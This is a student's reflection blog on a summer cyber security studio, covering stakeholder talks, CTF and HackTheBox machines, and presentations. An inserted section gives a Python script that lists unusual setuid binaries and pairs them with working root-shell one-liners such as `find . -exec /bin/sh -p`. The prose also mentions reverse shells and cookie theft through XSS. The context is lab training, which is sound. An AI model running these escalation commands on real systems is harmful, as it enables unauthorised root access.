Introduction

My time participating in Summer Studio B has been amazing. The Cyber Security Studio has really helped me develop my skills and increase my confidence when doing security challenges. The following post contains my final reflections and provides evidence of how I’ve been able to meet the five Subject Learning Outcomes (SLO) that were introduced at the start of the studio. I’ve really enjoyed myself taking this studio subject and the benefits that it has provided me are immeasurable. I really want to thank the studio tutors Larry, Darsh, Jai and Luke for all they’ve done to help me develop my skills and for the great opportunities that they have provided us with.


Final Reflection

SLO 1 - Engage with stakeholders to identify a problem

This studio was a bit different to the other studios in the sense that there wasn’t just one problem statement that we established in the first week and then tried to design a solution for. Each week I found myself redefining my problem statement, until eventually I refined my final problem statement to "Insecure, outdated applications and systems used by businesses will negatively impact stakeholders’ reputation, finance and consumer trust if they are ever exploited." I was able to reach this problem definition by engaging with multiple stakeholders including:

  • Robert Mitchell from GitLab (Week 1)
  • Raaqim Mohammed, security consultant at PWC (Week 2)
  • Viren Khatri, Simon Baeg and Nathan Jones from the Deloitte Cyber Attack Team (Week 3)
  • Ruben Thijssen from Symantec (Week 4)
  • My tutors Larry, Jai, Darsh and Luke (Every week)

Each engagement with these stakeholders provided me with a new perspective on my problem and allowed me to continually develop and shape my final problem statement. My problem statement went through a metamorphosis with:

  • Week 1:
    "Human error is complicit in the majority of data breaches that occur due to poor education and training"
  • Week 2:
    "The increasing adoption of web applications by businesses as a platform to undertake operations can result in negative impact to businesses given the insecure nature of web applications and the numerous vulnerabilities that can be used to exploit web applications"

My final problem statement encompasses the issues that I highlighted in both previous problem statements. Human error, whether malicious or not, is one of the leading contributing factors in data breaches; all it takes is one person clicking the wrong link for a malicious actor to cause damage. This is mostly a result of poor education and training, in conjunction with exploits that can be leveraged against insecure applications, so always make sure that the applications you use are up to date with the latest security patches. In my final problem statement, web applications are also included under the banner of insecure, outdated applications and systems. I proved throughout the studio with a variety of vulnerable machines that it is possible to go from an insecure website to the root user of a machine. As the owner of a machine, you can do anything you want to it, including deleting the entire contents of the system, resulting in negative financial and operational impacts which will prove costly to the stakeholders of a business.

SLO 2 - Apply design thinking to respond to a defined or newly identified problem

At the start of the studio, I struggled with utilising design thinking properly; however, throughout the later stages of the studio I found that I was able to employ design thinking quite effectively when approaching challenges. The practice of testing vulnerable machines that were modelled after machines found in the real world allowed me to gain greater insight into the impacts that improperly patched systems would have on stakeholders. It was interesting using the steps in the design thinking process and applying them to problems that I faced on challenges.

The steps of define, ideate, test and implement were especially useful in completing challenges. To solve a challenge, we can follow these steps:

  1. Define your goal
    i.e. getting root access on a machine
  2. Brainstorm techniques or exploits that can be used to achieve your goal
    i.e. checking sticky bits for privilege escalation, stored XSS to steal an admin cookie
  3. Start testing your techniques and exploits to see if any extra information is exposed or if an exploit works
    i.e. start deploying exploits and leveraging techniques to see if there’s a chance of success
  4. After finding a successful technique, implement that technique/exploit and achieve your goal
    i.e. getting a root shell from a misconfigured service, stealing an admin cookie and logging into their account
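The four steps above amount to a triage loop, and one of the brainstormed techniques deserves a precise name: the privilege-escalation check the post calls "sticky bits" is really a check for the setuid bit. The sticky bit (mode 1000, shown as `t`, as on /tmp) only restricts who may delete files in a shared directory; the setuid bit (mode 4000, shown as `s`) is what makes a program run with its owner’s privileges, which is the bit that matters for getting root. The Python script below is an added example written for this page, not code from the post or the studio. It walks the define/ideate/test/implement loop over a constructed `find / -perm -4000 -type f` listing: parse the candidates, drop the binaries every distribution ships setuid, and attach the well-documented shell-spawning invocation for whatever remains. The paths in FIND_OUTPUT, the baseline set and the custom binary `backup` are all assumptions made for the example.

```python
import os
import stat

# Constructed sample: what `find / -perm -4000 -type f 2>/dev/null` might print
# on a vulnerable machine.  Not taken from any box mentioned in the post.
FIND_OUTPUT = """\
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/find
/usr/bin/python2.7
/usr/local/bin/backup
/usr/bin/chsh
"""

# Setuid binaries that most Linux distributions ship by default (assumed
# baseline for the example).  Anything not listed deserves a closer look.
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec",
}

# Well-known ways a setuid copy of these programs spawns a root shell.
# `-p` tells sh/bash to keep the effective uid instead of dropping it.
ESCALATION_HINTS = {
    "find": "find . -exec /bin/sh -p \\; -quit",
    "bash": "bash -p",
    "env": "env /bin/sh -p",
    "python": "python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'",
}


def parse_find_output(text):
    """Step 1, define: the goal is root, the input is every setuid path found."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def unusual_suid(paths, baseline=BASELINE_SUID):
    """Step 2, ideate: discard stock setuid binaries, keep the odd ones."""
    return [p for p in paths if p not in baseline]


def hint_for(path):
    """Step 3, test: map a binary to a known shell-spawning invocation.
    Version suffixes such as python2.7 match the python entry.  Unknown
    binaries (e.g. a custom /usr/local/bin/backup) return None and need
    manual analysis with strings/ltrace before they can be exploited."""
    name = os.path.basename(path)
    for key, command in ESCALATION_HINTS.items():
        suffix = name[len(key):]
        if name == key or (name.startswith(key) and suffix.replace(".", "").isdigit()):
            return command
    return None


def triage(find_text, baseline=BASELINE_SUID):
    """Step 4, implement: the ordered to-do list for the escalation attempt."""
    candidates = unusual_suid(parse_find_output(find_text), baseline)
    return [(p, hint_for(p)) for p in candidates]


def describe_mode(mode):
    """Name the special permission bits in a mode so setuid (s) is not
    confused with the sticky bit (t): only setuid/setgid change privileges."""
    names = []
    if mode & stat.S_ISUID:
        names.append("setuid")
    if mode & stat.S_ISGID:
        names.append("setgid")
    if mode & stat.S_ISVTX:
        names.append("sticky")
    return names


if __name__ == "__main__":
    for path, hint in triage(FIND_OUTPUT):
        print(f"{path:28} {hint or 'no known one-liner; inspect manually'}")
    print("0o4755 ->", describe_mode(0o4755))  # setuid, e.g. /usr/bin/passwd
    print("0o1777 ->", describe_mode(0o1777))  # sticky, e.g. /tmp
```

On a real target you would run the `find` command on the box and paste its output in place of the constructed listing. The `-p` flag in the hints is the detail that most often trips people up: bash and dash drop the effective uid back to the real uid when they differ, so a shell spawned without `-p` from a setuid binary lands you back as the low-privileged user.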

Being able to follow this process and get root access to a number of machines, I started to realise the impact that businesses would face if they were using insecure, outdated applications. Considering that root-level users could essentially do as they pleased with the machine, for example delete the entire file structure and backups, it was easy to imagine the financial and reputational loss that a business would face if their systems or applications were ever exploited.

The fresh perspectives that industry visitors brought to the table were especially useful in gaining an insight into the damage that a business would face if they were ever breached, as well as the impact that breaches would inflict on customers. My research task in Week 1 was helpful in quantifying the potential financial damage that could have occurred if the Steam CD Key bug had gone undetected. I felt that I was able to successfully employ design thinking to solve challenges, break into and own vulnerable machines and redefine my problem statement.

SLO 3 - Apply technical skills to develop, model and/or evaluate design

Throughout the entirety of the studio, I was required to apply my technical skills quite extensively in order to meet deliverables and to get root access on vulnerable machines. I’ve included a list of what I did each week that required the use of technical skills:

  • Week 1:

    • Leverage web hacking knowledge to complete challenges on OWASP Juice Shop app (evidence can be found on my week 1 reflection here)
    • Techniques leveraged:
      • SQL Injection
      • Cookie Manipulation
      • Stored XSS
  • Week 2:

    • More advanced web application penetration testing, completed the Lernaean challenge on HackTheBox, evidence can be found here and the first challenge for the MrRobotCTF
    • Techniques leveraged:
      • Password brute forcing with Hydra
      • Directory enumeration
  • Week 3:

    • Completed the beginner machine Toppo on VulnHub, completed the Piper vulnerable machine from the Deloitte Cyber Attack Team and got user access on the Access vulnerable machine on HackTheBox. My write up for Toppo can be found here and my write up for Piper can be found here
    • Techniques leveraged:
      • Nmap scanning
      • Directory enumeration
      • Deploying reverse shells
      • Privilege Escalation through sticky bits and vulnerable web applications
  • Week 4:

    • Completed three machines on HackTheBox, Curling, Irked and Access, as well as Wakanda on VulnHub. Since these are active machines, I’m not allowed to post solutions to these machines based on the HackTheBox Terms of Service.
    • Techniques leveraged:
      • Nmap scanning
      • Privilege escalation with Curl and directory traversal
      • Privilege escalation with sticky bits
      • Privilege escalation with Pip
      • Privilege escalation with the runas command on a windows machine
      • Using metasploit and searchsploit to use payloads/exploits
      • Deploying reverse shells using netcat and Python

In order to get root access on vulnerable machines, I needed to utilise my technical skills to navigate, bypass and exploit them. I feel like I’ve done quite well with using technical skills; during the course of the studio I’ve managed to get root on 6 vulnerable machines, which feels like quite an achievement for me personally considering I’d only gotten root on one box previously.

SLO 4 - Demonstrate effective collaboration and communication skills

Collaboration and communication were a big segment of the studio and my personal learning experience. In industry, both of these skills are valuable and essential for success; being able to communicate with your team to keep them updated with your progress and your struggles is really important for successful engagements. Being able to explain technical details and the impacts of vulnerabilities to non-technical people, i.e. C-suite executives, is also really important to get the seriousness of the situation across. Throughout the studio I’ve had the opportunity both to work with other students on group presentations and to present to the class by myself on the impacts of vulnerabilities on businesses. The full list of presentations is as follows:

  • Week 1:

    • Group Presentation on Bug Bounties using the Steam CD Key bug as a case study
    • Slides, artefacts and reflection can be found here
  • Week 2:

    • Solo Presentation on Web Application Security and its impacts on stakeholders
    • Slides, artefacts and reflection can be found here
  • Week 3:

    • Group Presentation on Tools used to compromise systems; we used Wireshark and CyberChef
    • Slides, artefacts and reflection can be found here
  • Week 4:

    • Solo Presentation for Summer Studio Expo
    • Slides and artefacts can be found here

I’ve included evidence of collaboration work for group presentations in my weekly reflections for Week 1 and 2. Microsoft Teams and Facebook Messenger were the main means of communication for team presentations, and I felt that we utilised both Microsoft Teams and Planner to successfully schedule tasks and communicate with team members in order to complete presentations and provide feedback for each other. Outside of presentations, I worked quite a lot with other students in order to achieve root access on vulnerable machines. I’ve worked with Frank to get root access on Curling, Max to get root access on Piper and Rowan and Corey to get root access on Access.

In addition to collaboration on group presentations and working on vulnerable machines, studio leaders facilitated daily stand-ups and free-for-all sessions where students could share their greatest discoveries, struggles, progress and plans with each other. I found each of these sessions really insightful and was able to offer suggestions to other students to help them with things that they were struggling with, like helping David get root on Piper.

I feel like I’ve demonstrated really good communication skills based on the feedback that I’ve gotten from studio leaders and tutors. I’ve learned a lot from the feedback I was given, especially about adapting presentations to fit the audience that I’m presenting to, as well as how to get the most impact with my audience in the shortest amount of time.

SLO 5 - Conduct critical self and peer review and performance evaluation

Being truthful with yourself and being able to identify your own flaws is really important; this allows you to work on your deficiencies and improve yourself overall. Throughout the studio we were given feedback quite regularly by our studio leaders and tutors. I found this invaluable, as I was able to gain an outside perspective in addition to my own about what some of my flaws were and what I could do to address and strengthen them. The feedback provided also gave me a good indication of my performance in the subject, and it was rewarding to see that my efforts were being recognised. Although my feedback was mainly positive and identified few flaws in my work, I felt that improvements could definitely be made to things that were not graded, such as time management and organisation; being able to improve on these two skills allowed me to accomplish more throughout the later parts of the studio.

Another mechanic in the studio, the daily stand-ups and free-for-alls, were great opportunities to self-reflect and identify any personal problems that we were having and how we would address them. These stand-ups and free-for-alls also allowed us to peer review other students and to identify and help them with things that they were struggling with.

I felt that I was able to successfully conduct critical self review and performance evaluation through the medium of weekly sprint retrospectives that focused on what I thought I did well and what I felt needed improvement. These segments were under the Summary (tl;dr) sections in my blog and are intended to provide a short summary of my achievements and struggles throughout the week.


Conclusion

I started out in this subject not really sure what I was really getting myself into. I had developed a list of goals that I wanted to achieve by the end of the studio, these goals were:

  • A portfolio that I can use to find employment
  • More in depth technical knowledge
  • Gain enough experience/knowledge to start hunting bug bounties on the side
  • Actually get employment in security role

The learning journey throughout the studio was not easy by any means, but it allowed me an insight into an industry that I want to spend the foreseeable future in. From the start of the studio, where my knowledge was limited and mainly focused on web application security, to being constantly challenged each week to overcome new problems, and finally reaching a stage where I can quite happily dive into a bunch of intermediate boot2roots and have some notion of what I’m doing, I can confidently say that I had more than met and satisfied two of my goals by the end of the studio.

Being able to get this portfolio up and running was something that I’ve been wanting to achieve for months and having a blog set up in under a week has been one of my highlights of the subject. The existence of this blog will allow me to have a platform that I can use to showcase my activities and achievements and hopefully achieve one of my other goals to get employed.

The logical progression of skills that the studio facilitated, from simple web exploits to more advanced privilege escalation techniques, allowed me to go from a beginner with some security knowledge into someone who’s able to enumerate vulnerable machines and find misconfigurations and exploit them. Coming from achieving a grand total of one easy HackTheBox machine in the past to now when I’ve achieved root access on 3 active machines on HackTheBox, I can safely say that I’ve achieved my goal of gaining a higher degree of technical knowledge.

In hindsight, being able to start hunting for paid bug bounties and gain employment in a security-related field was relatively unrealistic for a 4 week studio course. However, despite not satisfying those two goals in the time period that the studio was running, it doesn’t mean that I can’t still keep them as goals for the near future. In my reflection for week 4, I’ve added a list of goals for the future. Although the studio is over, this is not the end of my learning journey and I’m looking forward to the challenges ahead of me.